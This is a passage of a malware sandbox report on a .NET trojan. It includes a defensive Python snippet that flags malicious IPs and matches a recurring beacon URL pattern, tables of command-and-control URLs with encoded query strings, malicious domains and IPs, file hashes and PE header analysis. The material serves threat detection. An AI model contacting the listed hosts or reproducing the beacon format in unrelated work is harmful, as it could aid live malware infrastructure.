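    ("154.80.226.18", "Seychelles", 134548, "DXTL-HKDXTLTseungKwanOServiceHK", True),
    ("94.73.146.42", "Turkey", 34619, "CIZGITR", True),
]

# Constructed input: the four URLs listed for 198.185.159.144 under Joe Sandbox View / Context.
CONTEXT_URLS = [
    "www.tomp3d.net/r8pp/?T8Vh=sK1DNTBFqnrDAEjJC5kiCuoZRuCrxJUK8uWX4HE4LqyCFvrnAwtCR7VNjd5adBJB+5ul&-ZPl=1bdpal",
    "www.usmedicarenow.com/bw82/?RF=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&MpFxo=z4X81vGpK2z8",
    "www.magiclabs.media/bw82/?rp=P2+pz5Ip5Thw4xSsr1TQmwqfNtgh4ua+i2k1cmEpjT3MKeCHzs63ua9Pxqw8Bg75uSCp&RR=YrHlp8D",
    "www.theatomicshots.com/xle/?Ppd=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns&BX=E0G8YpdxI8F",
]

PATH_TOKEN = re.compile(r"^/([a-z0-9]{2,6})/$")       # one short directory, trailing slash
LONG_B64 = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")   # long base64-looking blob
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{1,16}$")       # short alphanumeric tail value


def malicious_ips(rows):
    """Routable addresses the sandbox flagged, in table order; private/reserved ranges are dropped."""
    out = []
    for ip, _country, _asn, _name, flagged in rows:
        if flagged and ipaddress.ip_address(ip).is_global:
            out.append(ip)
    return out


def beacon_shape(url):
    """Split a URL and say whether it fits the shape the context rows share."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    params = []
    for piece in parts.query.split("&"):
        if piece:
            key, _, value = piece.partition("=")  # split at the first '=' only; base64 padding stays intact
            params.append((key, value))
    token = PATH_TOKEN.match(parts.path)
    matches = (
        token is not None
        and len(params) == 2
        and LONG_B64.match(params[0][1]) is not None
        and SHORT_TOKEN.match(params[1][1]) is not None
    )
    return {
        "host": parts.hostname,
        "path_token": token.group(1) if token else None,
        "params": params,
        "matches": matches,
    }


def shared_tokens(urls):
    """Count the directory token per URL; a token recurring across unrelated hosts is a pivot point."""
    counts = {}
    for u in urls:
        t = beacon_shape(u)["path_token"]
        if t:
            counts[t] = counts.get(t, 0) + 1
    return counts


if __name__ == "__main__":
    print("flagged IPs:", malicious_ips(CONTACTED_IPS))
    for u in CONTEXT_URLS:
        shape = beacon_shape(u)
        print(shape["host"], shape["path_token"], shape["matches"])
    print("directory tokens:", shared_tokens(CONTEXT_URLS))
```

The host names in those four rows differ and are of no use as a pivot, but the directory token is reused (`bw82` appears under two hosts), and the query shape is identical across all four, so a network-detection rule built on the shape plus the token list survives a change of domain where an IP or host blocklist does not.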

                                                                        General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356496
Start date: 23.02.2021
Start time: 08:58:34
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 7s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: vBugmobiJh.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/1@15/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 43.8% (good quality ratio 39.4%)
• Quality average: 73.6%
• Quality standard deviation: 31.9%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                        • TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 168.61.161.212, 131.253.33.200, 13.107.22.200, 93.184.220.29, 23.210.249.50, 104.43.193.48, 92.122.145.220, 104.43.139.144, 52.255.188.83, 23.210.248.85, 51.104.144.132, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.104.139.180
• Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
08:59:31 | API Interceptor | 1x Sleep call for process: vBugmobiJh.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
198.185.159.144 | SHED.EXE | malicious | www.tomp3d.net/r8pp/?T8Vh=sK1DNTBFqnrDAEjJC5kiCuoZRuCrxJUK8uWX4HE4LqyCFvrnAwtCR7VNjd5adBJB+5ul&-ZPl=1bdpal
198.185.159.144 | 4vnTrjsACd.rtf | malicious | www.usmedicarenow.com/bw82/?RF=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&MpFxo=z4X81vGpK2z8
198.185.159.144 | FEB_2021.EXE | malicious | www.magiclabs.media/bw82/?rp=P2+pz5Ip5Thw4xSsr1TQmwqfNtgh4ua+i2k1cmEpjT3MKeCHzs63ua9Pxqw8Bg75uSCp&RR=YrHlp8D
198.185.159.144 | NNFYMCVABc.exe | malicious | www.theatomicshots.com/xle/?Ppd=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns&BX=E0G8YpdxI8F
198.185.159.144 | q2o0a1neTm.exe | malicious | www.theatomicshots.com/xle/?u6u4=hBWp7l4HSL7&MZQL=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns
198.185.159.144 | invoice.jpg.exe | malicious | www.quantumsoundtherapy.info/jsw/?UtzP=GFQLLtYPWZplVZ&IfrXthQ=5e9NVW9syr8P9XSSCcw9PPY9meKGkrzS0YcQp6jXQzD/XwUeWOlBZP3dmv9HrmYsxpsg
198.185.159.144 | PR Agreement FEB2021.xlsx | malicious | www.usmedicarenow.com/bw82/?rDHt=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&9rbPKt=zzr4Wp8XVp9
198.185.159.144 | ships documents.xlsx | malicious | www.artisthenewmeditation.com/gqx2/?Czud=Dpp83ZapOz0DiPO&-Z7tZ=r/jg5sepAma4rZB3R6YWcuCeFVZouiCpBAkT8M+MS5l4cSJdb1sCs2PXH8wnC+lApn+oZQ==
198.185.159.144 | M0uy4pgQzd.exe | malicious | www.theatomicshots.com/xle/?9rq=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUSyJ+P4BMn6MYJMQQ==&4h0=vTR8SldxW2Clmhi
198.185.159.144 | INV_TMB_C108976.xlsx | malicious | www.theatomicshots.com/xle/?erjl7vOP=dZpq/2Sexe9bjaltgMNZYhV3L/2Ns2NYRAlHzaSEv5WphfmA/yGGZ09CbyS0RfXwN6TbVg==&TB=8p50hjbp4rS43N
198.185.159.144 | q5oRsfy1vk.exe | malicious | www.livisprogrammingadventure.com/w8en/?jrQDTX=IdRnP5iycLKMIZLMxzjK1mKkkcfwvyJhnPJgOKI25qH0jZkIFIOnsUp241V0RIqCRmvy&K2JxgH=Exop8hRXRdA
198.185.159.144 | YWrrcqVAno.exe | malicious | www.magiclabs.media/bw82/?u8iLW=P2+pz5Ip5Thw4xSsr1TQmwqfNtgh4ua+i2k1cmEpjT3MKeCHzs63ua9PxpQGRxbB01ju&OhNhA=9rUlSVPXQJJ
198.185.159.144 | wYpMWI3N52.exe | malicious | www.teppeisugaya.com/p7t/?BlL=8T8LKpq1NrovzOWZxbE+5VRL+huCfHU9bKk3jO1v/3hQ4SgVI22Wd89Fmwic7Ahh4Z3r88CvIw==&a48=tXIxBn8h
198.185.159.144 | Agreement.xlsx | malicious | www.usmedicarenow.com/bw82/?OxlhlP1x=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&-Zz=NpM4AdWXGTqt_ry0
198.185.159.144 | Doc_37584567499454.xlsx | malicious | www.soundon.events/csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8
198.185.159.144 | xl2Ml2iNJe.exe | malicious | www.theatomicshots.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUSLWPv7Pa79MYJLDg==
198.185.159.144 | Inquiry_73834168_.xlsx | malicious | www.sentire.design/incn/?9r_PU=-ZQLEn&e2Jdlzf8=5ltUxrttwFhptoEbwwSBkwhwumkFdmMXQM+4K6mrQNNQqM/0ADGIG+m5mhGMml3JysWX3Q==
198.185.159.144 | hmH9ZhBQFD.exe | malicious | www.magiclabs.media/bw82/?AjR=P2+pz5Ip5Thw4xSsr1TQmwqfNtgh4ua+i2k1cmEpjT3MKeCHzs63ua9PxpQsOBrBw3ru&ndnDnN=-Zh4gtKhzFrx
198.185.159.144 | Signatures Required 21-01-2021.xlsx | malicious | www.usmedicarenow.com/bw82/?KPO0Ltt0=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&GzuD_=dp5pdVbpjd
198.185.159.144 | PO210119.exe.exe | malicious | www.edmondscakes.com/2kf/?9r4P2=J484&xPGHVhT0=9XMLlWJTI6vAfrHRazBeuJnX2zF/KKkFVijVc9HuNL/CE78GsXIW/AGNdR4jkREGsVcZ
52.128.23.153 | CMahQwuvAE.exe | malicious | www.wellnesssensation.com/bw82/?CneDg=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&Dxlpd=2dmp
52.128.23.153 | kgozmovHpY.exe | malicious | www.wellnesssensation.com/bw82/?6l=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&SX=clxhAzZHuDkt
52.128.23.153 | Quotation.exe | malicious | www.zxr.xyz/uidr/?b6=OIh+/TUGYtHkksmH1NubrXk8ZEC83cFB3oCTZkko6fyplAOAg6boTSOjLerGQzPy4DZG&DbG=_DKdFj
52.128.23.153 | 9j4sD6PmsW.exe | malicious | www.ztn.xyz/kre/?aR-8_FK0=/OmeH08klj8Emb5cHiqJz2STBy0Ye9mrU8ZXiQwG4LeQOsMJ7GfY8GRhQFFllHEDttjP&UlPt=DVohLl3xOrmlMF
52.128.23.153 | Q6h03zxheA.exe | malicious | www.digitalqe.com/o8na/?j2JxtP=th2X0/zIHqAtzslZcArG5kD1owa9skBHDkLykKde96nSEltyU3QCQBf29olgqEuVXAq8&wXR=OZQhZV
52.128.23.153 | PO 213409701.xlsx | malicious | www.stafffully.com/oean/?rFQt=+9WAEfQHyu5DxAQ+gadjC39SRpvqs9f27bZYIVY/K0MRnG/DHk6SppnSAP7rKZznuiHEQw==&rF=9rbPKz
52.128.23.153 | rwo02135.xls | malicious | www.bsf.xyz/krc/?L4rX=oSG3T25l4/YAqNLHPcXBvI98o2n2iP7ZIEME4K1keiBsyMfj22gUNUGLu0VeX478xnofWA==&mJE=DR-0XxipH
52.128.23.153 | Payment Advice_Pdf.exe | malicious | www.commissary.xyz/dll/?TlW8=GvPH&aR-87Pm8=ULdTytqf2rQ7ZVckiKmBlBuvsRDYK7PoxU+BUyJc8vuwhBatel9ZbpqKUJ6SnOHYH2D/
52.128.23.153 | d6DdOfC2CX.exe | malicious | www.stafffully.com/oean/?8pgPiXdx=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqX9OJ3Ulha0&a48=tXIxBnA8MdXL_
52.128.23.153 | hkcmd.exe | malicious | www.wellnesssensation.com/bw82/?FVWl=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&AlO=O2MtmfRxc
52.128.23.153 | WlBvCPCRcs.exe | malicious | www.stafffully.com/oean/?YV8h-V18=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqXXR5HUhjS0&BBZ=OxlhVXB8mRxx4
52.128.23.153 | Sf6jgQc6Ww.exe | malicious | www.stafffully.com/oean/?DvjTU=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqX9OJ3Ulha0&5j=UjPt
52.128.23.153 | gPGTcEMoM1.exe | malicious | www.wellnesssensation.com/bw82/?W6=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&odeTY=cnxhAP6x
52.128.23.153 | INGNhYonmgtGZ9Updf.exe | malicious | www.telemedicinehamilton.com/ur06/?nt=ztK245chmnIywpDGI4ek/D+nW6cQvNzYzIHlYN6EpFuBe4trEXs3pNZL9gyKqZCfJgWX&2d=9rm4l4y
52.128.23.153 | SecuriteInfo.com.generic.ml.exe | malicious | www.qpremodeling.com/kna/?xPIXBzFp=NoCfivEV1PLdrp8eYMZxLhQhAzIcUx+gSuDkoGiYoCEogO380D4Agw8IcsOOecu5pw3i&tXxh=J69Hp
52.128.23.153 | hmH9ZhBQFD.exe | malicious | www.wellnesssensation.com/bw82/?AjR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&ndnDnN=-Zh4gtKhzFrx
52.128.23.153 | pY5XEdTwX7.exe | malicious | www.digitalqe.com/o8na/?pPc=th2X0/zIHqAtzslZcArG5kD1owa9skBHDkLykKde96nSEltyU3QCQBf29olK10eVTCi8&Hpq=V6AHdRq0KFzPzJ
52.128.23.153 | inv.exe | malicious | www.downdepot.com/hko6/?nt=mXCqokiU7aahy2Tl94RpXoHD4B1ok0f4qPPHxvq4K0GXA9n2t69xdHGs0dxLYqq3E6R+&sPXL3H=mnRly2QHp2o8
52.128.23.153 | PRS TT copy_pdf.exe | malicious | www.globalefactory.com/s9zh/?uzul2=cfAP3dhEcu1Vi8J1aoBKUOXri8rpYHK2f4rCuERqPTnzLwFEaC7qLWEHuEMA0ziq3rYS&Oj9XRV=9rXLsjgpIh1
52.128.23.153 | SKM_C36821010708320.exe | malicious | www.ehealthla.com/6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45

Domains

Match | Associated Sample Name / URL | Detection | Context
www.wellnesssensation.com | CMahQwuvAE.exe | malicious | 52.128.23.153
www.wellnesssensation.com | kgozmovHpY.exe | malicious | 52.128.23.153
www.wellnesssensation.com | hkcmd.exe | malicious | 52.128.23.153
www.wellnesssensation.com | gPGTcEMoM1.exe | malicious | 52.128.23.153
www.wellnesssensation.com | hmH9ZhBQFD.exe | malicious | 52.128.23.153
www.wellnesssensation.com | 2021 Additional Agreement.exe | malicious | 52.128.23.153
www.wellnesssensation.com | wDMBDrN663.exe | malicious | 52.128.23.153
www.wellnesssensation.com | KYC - 17DEC.xlsx | malicious | 52.128.23.153
www.wellnesssensation.com | NEW ORDER 15DEC.xlsx | malicious | 52.128.23.153
www.wellnesssensation.com | uM87pWnV44.exe | malicious | 52.128.23.153
www.wellnesssensation.com | Xqgvj3afT1.exe | malicious | 52.128.23.153
www.wellnesssensation.com | at3nJkOFqF.exe | malicious | 52.128.23.153
www.thebabyfriendly.com | 7R29qUuJef.exe | malicious | 154.80.226.18
www.thebabyfriendly.com | kgozmovHpY.exe | malicious | 154.80.226.18
www.thebabyfriendly.com | 2S6VUd960E.exe | malicious | 154.80.226.18
www.thebabyfriendly.com | gPGTcEMoM1.exe | malicious | 154.80.226.18
www.thebabyfriendly.com | NEW AGREEMENT 2021.xlsx | malicious | 154.80.226.18
www.thebabyfriendly.com | NEW AGREEMENT 19 01 2021.xlsx | malicious | 154.80.226.18
www.thebabyfriendly.com | u6uz950JO1.exe | malicious | 154.80.226.18
www.thebabyfriendly.com | n1W2zlEddS.exe | malicious | 154.80.226.18
www.thebabyfriendly.com | 28zrX5JJmg.exe | malicious | 108.62.32.237
www.thebabyfriendly.com | DEC 12-08 Wire.xlsx | malicious | 108.62.32.237

ASN

Match | Associated Sample Name / URL | Detection | Context
GOOGLEUS | ORDER SPECIFICATIONS.exe | malicious | 34.102.136.180
GOOGLEUS | crypted.exe | malicious | 216.239.32.21
GOOGLEUS | NewOrder.xlsm | malicious | 34.102.136.180
GOOGLEUS | Order_20180218001.exe | malicious | 34.102.136.180
GOOGLEUS | 22 FEB -PROCESSING.xlsx | malicious | 34.102.136.180
GOOGLEUS | SOA.exe | malicious | 35.186.238.101
GOOGLEUS | ORDER LIST.xlsx | malicious | 34.102.136.180
GOOGLEUS | File Downloader [14.5].apk | malicious | 142.250.186.74
GOOGLEUS | PO_210222.exe | malicious | 34.102.136.180
GOOGLEUS | Order83930.exe | malicious | 34.102.136.180
GOOGLEUS | unmapped_executable_of_polyglot_duke.dll | malicious | 216.239.32.21
GOOGLEUS | GUEROLA INDUSTRIES N#U00ba de cuenta.exe | malicious | 142.250.186.33
GOOGLEUS | DHL eInvoice_Pdf.exe | malicious | 34.102.136.180
GOOGLEUS | AWB-INVOICE_PDF.exe | malicious | 34.102.136.180
GOOGLEUS | xerox for hycite.htm | malicious | 142.250.186.33
GOOGLEUS | rad875FE.tmp.exe | malicious | 34.102.136.180
GOOGLEUS | SecuriteInfo.com.Trojan.Inject4.6572.17143.exe | malicious | 34.102.136.180
GOOGLEUS | IMG_61061_SCANNED.doc | malicious | 35.200.172.247
GOOGLEUS | X1(1).xlsm | malicious | 142.250.186.66
GOOGLEUS | IMG_6078_SCANNED.doc | malicious | 35.200.172.247
SQUARESPACEUS | PO-29840032.exe | malicious | 198.49.23.145
SQUARESPACEUS | IMG_01670_Scanned.doc | malicious | 198.49.23.144
SQUARESPACEUS | 210222 Po No 10921-01.exe | malicious | 198.49.23.144
SQUARESPACEUS | Shinshin Machinery.exe | malicious | 198.49.23.145
SQUARESPACEUS | CMahQwuvAE.exe | malicious | 198.49.23.144
SQUARESPACEUS | SHED.EXE | malicious | 198.185.159.144
SQUARESPACEUS | wFzMy6hehS.exe | malicious | 198.49.23.145
SQUARESPACEUS | INCHAP_Invoice_21.xlsx | malicious | 198.49.23.145
SQUARESPACEUS | 4vnTrjsACd.rtf | malicious | 198.185.159.144
SQUARESPACEUS | Credit Card & Booking details.exe | malicious | 198.185.159.145
SQUARESPACEUS | q9xB9DE3RA.exe | malicious | 198.49.23.144
SQUARESPACEUS | po.exe | malicious | 198.185.159.145
SQUARESPACEUS | FEB_2021.EXE | malicious | 198.185.159.144
SQUARESPACEUS | 2H2JIKQ8tN.exe | malicious | 198.49.23.145
SQUARESPACEUS | Shipping Doc.exe | malicious | 198.185.159.145
SQUARESPACEUS | NNFYMCVABc.exe | malicious | 198.185.159.144
SQUARESPACEUS | NdxPGuzTB9.exe | malicious | 198.185.159.145
SQUARESPACEUS | pfjgWtj6ms.exe | malicious | 198.49.23.144
SQUARESPACEUS | q2o0a1neTm.exe | malicious | 198.185.159.144
SQUARESPACEUS | Order 8953-PDF.exe | malicious | 198.49.23.144
DOSARRESTUS | CMahQwuvAE.exe | malicious | 52.128.23.153
DOSARRESTUS | kgozmovHpY.exe | malicious | 52.128.23.153
DOSARRESTUS | Quotation.exe | malicious | 52.128.23.153
DOSARRESTUS | 9j4sD6PmsW.exe | malicious | 52.128.23.153
DOSARRESTUS | Q6h03zxheA.exe | malicious | 52.128.23.153
DOSARRESTUS | PO 213409701.xlsx | malicious | 52.128.23.153
DOSARRESTUS | rwo02135.xls | malicious | 52.128.23.153
DOSARRESTUS | Payment Advice_Pdf.exe | malicious | 52.128.23.153
DOSARRESTUS | d6DdOfC2CX.exe | malicious | 52.128.23.153
DOSARRESTUS | hkcmd.exe | malicious | 52.128.23.153
DOSARRESTUS | WlBvCPCRcs.exe | malicious | 52.128.23.153
DOSARRESTUS | Sf6jgQc6Ww.exe | malicious | 52.128.23.153
DOSARRESTUS | gPGTcEMoM1.exe | malicious | 52.128.23.153
DOSARRESTUS | INGNhYonmgtGZ9Updf.exe | malicious | 52.128.23.153
DOSARRESTUS | SecuriteInfo.com.generic.ml.exe | malicious | 52.128.23.153
DOSARRESTUS | hmH9ZhBQFD.exe | malicious | 52.128.23.153
DOSARRESTUS | pY5XEdTwX7.exe | malicious | 52.128.23.153
DOSARRESTUS | inv.exe | malicious | 52.128.23.153
DOSARRESTUS | PRS TT copy_pdf.exe | malicious | 52.128.23.153
DOSARRESTUS | SKM_C36821010708320.exe | malicious | 52.128.23.153

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vBugmobiJh.exe.log
Process:C:\Users\user\Desktop\vBugmobiJh.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1314
Entropy (8bit):5.350128552078965
Encrypted:false
SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:true
Reputation:high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.409707473737011
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: vBugmobiJh.exe
File size: 484864 bytes
MD5: 5b59e521935e56a03255623df51c1631
SHA1: b6714751ef5127dd84bed782a30eb44b7add8813
SHA256: e6370f5f39e8e3d7a2506659786deadd1fe5ce8208cb2b6bf7748b6637a3b793
SHA512: 8d0717bce547dadb138b4f72a6219ea64cd3d07d790e4f1f5a7cec2d45cb280e0edcb6d286735ae6d539607ba8f75021b73913a37a1e23d9ba2e1e1c68bf6453
SSDEEP: 12288:NkYb2AUt9fvqbzYInHoSlujCXLpp1PFmPAtIeA5e13:9bif6zYMISl7tNmPMIza3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.4`..............P..R...........p... ........@.. ....................................@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x4770f6
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x6034A02C [Tue Feb 23 06:26:52 2021 UTC]
TLS Callbacks: none (the TLS data directory is empty)
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

If the link-time stamp is genuine, the binary was built roughly an hour and a half before the network capture below (09:00 CET, i.e. 08:00 UTC, on the same day), so this is a fresh build rather than a long-circulating sample.

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the remaining lines of the preview all repeat "add byte ptr [eax], al": the bytes after the jump are 00 00 padding, which decodes to that instruction)

The single jmp is the stock native stub of a .NET executable. 0x00402000 is Imagebase 0x400000 plus RVA 0x2000, the 8-byte IAT listed under Data Directories, whose only slot holds the address of mscoree.dll!_CorExeMain (the only import). Execution goes straight into the CLR, so nothing in the native entrypoint is sample-specific; everything of interest is in the managed code and whatever it unpacks.

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x770a4 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x78000 | 0x1000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x750fc | 0x75200 | False | 0.75252009405 | data | 7.42173467133 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x78000 | 0x1000 | 0x1000 | False | 0.402587890625 | data | 5.01180684458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
